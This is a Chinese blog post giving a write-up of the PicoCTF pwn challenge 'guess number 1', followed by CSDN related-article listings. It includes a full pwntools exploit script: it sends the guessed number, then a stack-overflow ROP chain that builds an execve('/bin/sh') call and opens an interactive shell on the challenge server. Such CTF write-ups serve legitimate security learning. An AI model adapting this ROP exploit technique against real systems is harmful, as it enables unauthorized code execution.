【PicoCTF】guess number 1

最新推荐文章于 2023-03-09 21:03:41 发布
最新推荐文章于 2023-03-09 21:03:41 发布
阅读量348 收藏
点赞数
分类专栏: buuctf刷题 文章标签: pwn ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/124218390
版权

例行检查:

在这里插入图片描述

分析

64位程序,一道静态编译的题目,ida中分析:
在这里插入图片描述

主要要绕过的函数为do_stuff(),双击进去查看:
在这里插入图片描述

我们这要猜对数字,就会返回v5=1,然后就会在主函数执行win()函数,win()函数中存在栈溢出:
在这里插入图片描述

大小为0x168,思路就很清晰了,接下来就开始exp的编写,

exp分析:

猜数字直接调试就可以看到是0x54,也就是84

刚开始我就直接用:

root@ubuntu:/home/giantbranch/Desktop/pico# ROPgadget --binary vuln --ropchain

来直接寻找rop链,但发现生成的rop链过长,字节数为908,长度过长,然后我发现工具生成的rop链最后一直在重复add rax ,1的操作,其实这里可以直接pop_rax_ret将rax置成0x3b,当时我脑子迷了,找到了一个这样的代码段,

0x000000000042beac : xchg eax, edx ; sub eax, edx ; ret

想着利用xchg的交换,我发现既可以控制rax,又可以控制rdx,通过相减使rax为0x3b,(真是迷了),然后我的exp:

from pwn import *
from struct import pack

elf = ELF('./vuln')
io = remote('jupiter.challenges.picoctf.org',39940)
#io = process('./vuln')
libc = elf.libc
context(log_level='debug')

io.recvuntil('?')
io.sendline('84')
#0x000000000042bf78 : add rax, rcx ; ret  0x3c 0x1
#0x000000000042beac : xchg eax, edx ; sub eax, edx ; ret
p = 'A'*0x78
p += pack('<Q', 0x0000000000410ca3) # pop rsi ; ret
p += pack('<Q', 0x00000000006ba0e0) # @ .data
p += pack('<Q', 0x00000000004163f4) # pop rax ; ret
p += '/bin/sh\x00'
p += pack('<Q', 0x000000000047ff91) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000410ca3) # pop rsi ; ret
p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
p += pack('<Q', 0x0000000000445950) # xor rax, rax ; ret
p += pack('<Q', 0x000000000047ff91) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000400696) # pop rdi ; ret
p += pack('<Q', 0x00000000006ba0e0) # @ .data
p += pack('<Q', 0x0000000000410ca3) # pop rsi ; ret
p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
p += pack('<Q', 0x000000000044a6b5) # pop rdx ; ret
p += pack('<Q', 0x00000000006ba0e8) # @ .data + 8
p += pack('<Q', 0x0000000000445950) # xor rax, rax ; ret
p += pack('<Q', 0x00000000004163f4) #pop_rax;ret
p += p64(0x1)
p += pack('<Q', 0x000000000044a6b5) #pop_rdx;ret
p += p64(0x3c)
p += pack('<Q', 0x000000000042beac)
p += pack('<Q', 0x000000000044a6b5)
p += p64(0)
p += pack('<Q', 0x0000000000449e35)

print len(p)
io.recvuntil('e?')
#gdb.attach(io)

io.sendline(p)

io.interactive()

长度为288,还差好多,于是:在这里插入图片描述喜提flag!!!

Leee333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF|栈溢出guess num 练习及知识点总结
skyattractive的博客
05-31 1113
CTF|栈溢出题目guess_num 练习及知识点总结 博客主要记录博主做的一栈溢出题目和所涉及到的知识点的总结 . 题目 将得到的文件拖入64位IDA中F5反编译得到伪代码 观察伪代码 得到如下信息: 定义char型 v9 让你输入内容,用gets()函数获取你输入的值,但是没有做限制 将v6 = v8就success! 实现success!之后可以进入sub-C3E函数,即可得到flag! 其中代码涉及到两个特殊的函数 关于两个函数的知识点如下: rand()函数用来产生随机数,但是,ran.
GuessNumber
10-07
1程序运行时自动产生1-100 随机数,接受用户键盘输入数据并给出指示信息,直至猜对,游戏者猜对后,显示猜对次数,并提供“重新开始”与“退出”功能(此处最重要)。 2画流程图
Guess-The-Number:这是一个允许用户猜测数字的应用程序!
04-02
猜数字 概述 该应用程序允许用户猜测数字! 应用特色 要在终端中运行游戏,请输入:python game.py 猜一个介于1到100之间的数字 如果您弄错了,那么您会得到一个提示 技术领域 Python,终端 执照 作者 卡莱布·沙尼(Caleb Chaney)
【4】简单的代码实现
weixin_43741616的博客
03-29 264
1.完成猜数字游戏。 #define _CRT_SECURE_NO_WARNINGS #include<stdio.h> #include<stdlib.h> #include<time.h> void menu() { printf("**************************\n"); printf("********* 1.PALY ****...
buuctf-pwn刷题(二)
CHAWUCIREN1的博客
10-15 2046
ciscn_2019_n_1 直接运行一波 猜数字的 checksec file一下 放入ida 发现func函数里面有 东西 这个是一道溢出题,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值 查看一下栈空间 我们发现v2在栈上04的位置,也就是(0x30-4) 11.28125转化为十六进制为0x41348000 pay load= b’A’*(0x30-4) + p64(0x41348000) from pwn import * payload =
CTF
weixin_56817426的博客
04-12 998
文章目录CTF一、十进制转36进制做题步骤二、a1z26做题步骤三、4进制做题步骤总结 CTF 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、十进制转36进制 做题步骤 要先导入base36的数据包,否则无法运行。 代码: import base36 num=597142166468670232704404065453992639482284357949191.
MYGAMEs.zip_YRY_guess number
09-24
Guess a number game using fsm in VHDL
猜数字_between_guessnumber_
10-01
guess number between people and computer
guessnumber.cpp
最新发布
03-13
guessnumber.cpp
guess-number
07-16
Guess Number 运行环境 Node.js Atom 或者 IntelliJ IDEA 准备工作 在操作系统上安装 使用NVM安装稳定版的Node.js Clone本项目,在命令行中进入项目根目录并执行 npm install 安装项目所依赖的Node.js包 执行 npm ...
猜数字游戏 (C#)
09-13
猜数字  猜数字   猜数字可以算是一种益智类小游戏,一般两个人玩,也可以由一个人和电脑玩,可以在纸上、在网上都可以玩。这种游戏规则简单,但可以考验人的严谨和耐心。   目录   1 规则   1.1 次数限制   1.2 含重复数字的猜数字   2 解法   2.1 计算机解   2.2 推理解   2.3 代入解   2.4 其他   3 参看   规则   这个游戏的规则比较简单,一般两个人玩,一方出数字,一方猜。出数字的人要想好一个没有重复数字的4位数,不能让猜得人知道。猜的人就可以开始猜。每猜一个数字,出数者就要根据这个数字给出几A几B,其中A前面的数字表示位置正确的数的个数,而B前的数字表示数字正确而位置不对的数的个数。   如正确答案为5234,而猜的人猜5346,则是1A2B,其中有一个5的位置对了,记为1A,而3和4这两个数字对了,而位置没对,因此记为2B,合起来就是1A2B。   接着猜的人再根据出题者的几A几B继续猜,直到猜中为止。   次数限制   有的时候,这个游戏有猜测次数上的限制。根据计算机测算,这个游戏,如果以最严谨的计算,任何数字可以在7次之内猜出。而有些地方把次数限制为6次或更少,则会导致有些数可能猜不出来。而有些地方考虑到人的逻辑思维难以达到计算机的那么严谨,故设置为8次甚至10次。也有的没有次数上的限制。   含重复数字的猜数字   有一种使用范围比较狭窄的猜数字,是允许重复数字存在的猜数字,但由于其规则较复杂,故没有得到广泛的推广。其规则如下:   除了上面的规则外,如果有出现重复的数字,则重复的数字每个也只能算一次,且以最优的结果为准,   如正确答案为5543,猜的人猜5255,则在这里不能认为猜测的第一个5对正确答案第二个,根据最优结果为准的原理和每个数字只能有一次的规则,两个比较后应该为1A1B,第一个5位子正确,记为1A;猜测数字中的第三个5或第四个5和答案的第二个5匹配,只能记为1B。当然,如果有猜5267中的第一个5不能与答案中的第二个5匹配,因此只能记作1A0B。   解法   对于不同的人,常常会用到不同的解法   计算机解   通常采用的计算机解是通过排除法,即遍历所有可能的数,将不符合要求的数剃掉。   下面是一个计算机处理的例子:   for (int i = 0; i < Array.Count; i++) { if (Array与当前输出数字的比较 != 用户输入的与正确答案对比的结果) { Array.Remove(i); i--; } }      这个代码采用C#的语法,其中Array表示所有可能的数字的集合。这个例子为了方便说明,结合了语言的描述。   这样的方法充分利用了计算机计算速度快的优势,迅速排出不符合要求的数。通常第一次猜测的时间(有的引擎为第二次猜测)会在10秒左右,而随着猜测次数的不断增加,猜测的时间会越来越短,最后几乎不需要时间,这是由于集合中的数越来越少,排除需要的时间也随之减少。   推理解   计算机解释根据这种方法推广的。这种解法的中心思想是假设猜的这个数字是正确答案,即如果它为正确答案,那么这个数应该符合已经猜测的数及其结果。如已经有   1234 0A0B   那么下一步就不能猜含有1234中任一数字的数,因为如果正确答案含1234中任一,结果就不可能为0A0B。   这种解法对猜者要求较高,通常,可能会被定式思维所干扰,导致难以猜出。   基于这个解法,根据个人思维风格和起始数字选择的不同,以及对出题者出数风格的猜测,有时可以把猜测次数控制在5步内,但不总能在5步内猜出。   使用这种解法需要考虑的时间很久,和计算机解正好相反,人使用这种方法,通常随着猜测次数的增加,需要考虑的东西不断增多,反而考虑的时间会变得越来越长。   代入解   还有一种方法,在人的猜测中很常用,即将推理出不可能含有的数字,代入,察看那些数字是有的。   但这种方法其猜测次数难以确定,且通常的猜测次数比推理解多。   其他   可能还有其他的方法。
练习
scacacac的博客
11-28 181
猜数字游戏:https://github.com/jiangjunguo-web/c-learning/blob/master/Test_1124/Test_1124/Test_1124.c 三子棋游戏:https://github.com/jiangjunguo-web/c-learning/blob/master/Test_1123/Test_1123/Test_1123.c 课程的练习:ht...
猜数字大小
waqxy的专栏
11-29 672
//Copyright (c) 2014软件技术1班 // All rights reserved. // 作 者:A37 // 完成日期:2014年 11 月 26 日 // 版 本 号:v1.0 // // 问题描述:随机产生一个1~100随机数,要求输入的数与随机数比较。 // 输入描述:1个实数。 // 程序输出:是否猜中随机数。 using Syste
374:猜数字大小
weixin_41687289的博客
03-17 207
问题描述 我们正在玩一个猜数字游戏。 游戏规则如下: 我从 1 到 n 选择一个数字。 你需要猜我选择了哪个数字。 每次你猜错了,我会告诉你这个数字是大了还是小了。 你调用一个预先定义好的接口 guess(int num),它会返回 3 个可能的结果(-1,1 或 0): -1 : 我的数字比较小 1 : 我的数字比较大 0 : 恭喜!你猜对了! 示例 输入: n = 10, pick = ...
攻防世界Reverse进阶区-Guess-the-Number-writeup
y4ung
09-21 730
1. 介绍 本题是xctf攻防世界中Reverse的进阶区的题Guess-the-Number 题目来源: su-ctf-quals-2014 题目描述:猜个数字然后找到flag. 2. 分析 文件下载下来是一个jar包。在 http://java-decompiler.github.io/ 下载jd-gui,下载下来双击运行即可,免安装。 代码如下,读取用户输入的数字保存到guess_number,只有当my_number / 5 == guess_num
攻防世界逆向高手题之Guess-the-Number
沐一 · 林 的博客
08-20 730
攻防世界逆向高手题之Guess-the-Number 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的Guess-the-Number 下载了一个jar文件,根据题目描述猜个数字然后找到flag.,估计题目类型是flag存储型,满足条件就有flag: 用我之前做安卓逆向下载的jar.gui打开,查看代码逻辑: 逻辑不难,果然是满足条件就有的存储型flag,这里我直接修改截断代码即可,xor是生成存储型flag的代码,要保留: import java.math.BigInteger; publ
xctf攻防世界 REVERSE 高手进阶区 Guess-the-Number
l8947943的博客
04-09 9892
0x01. 进入环境,下载附件 题目给出的一个jar文件,我们双击打开,并将文件解压,找到其中的.class文件。我们将其反编译,此处有多种工具,我使用的vscode的Decompiler插件。如图 0x02. 问题分析 我们使用反编译得到的代码如下: import java.math.BigInteger; public class guess { public static String XOR(String _str_one, String _str_two) { BigInteger
攻防世界guess_num
Rt1Text的博客
03-27 496
题目 一点信息:猜数字 虚拟机里checksec
Buuctf [GUET-CTF2019]number_game 题解
OrientalGlass的博客
03-09 460
⑤judge2()函数实际上是将上一步操作中的内存空间保存的数据视为5*5矩阵,判断每行每列是否有重复元素,也就是一个数独问题。这里的dword_601080单元实际作用是循环计数变量,我最开始也看错了,以为是arr的值++这个函数是递归的将上一步得到的二叉树root用中序遍历的方式存储到arr_stor数组中。也就是说我们按照0-9的顺序输入,实际上会被转换成这样的位置存储到arr_stor数组内。本质上就是判断每行每列是否有重复元素,如果有就错误,所以这是一个5*5矩阵的数独问题。
guess_number()
11-30
根据提供的引用[1],`guess_number()`函数是一个猜数字游戏的函数,它使用二分查找算法来猜测一个数字。该函数的实现如下: ```c++ int try_number(int); int guess_number(){ int l=0,r=1000000000; while(l){ ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值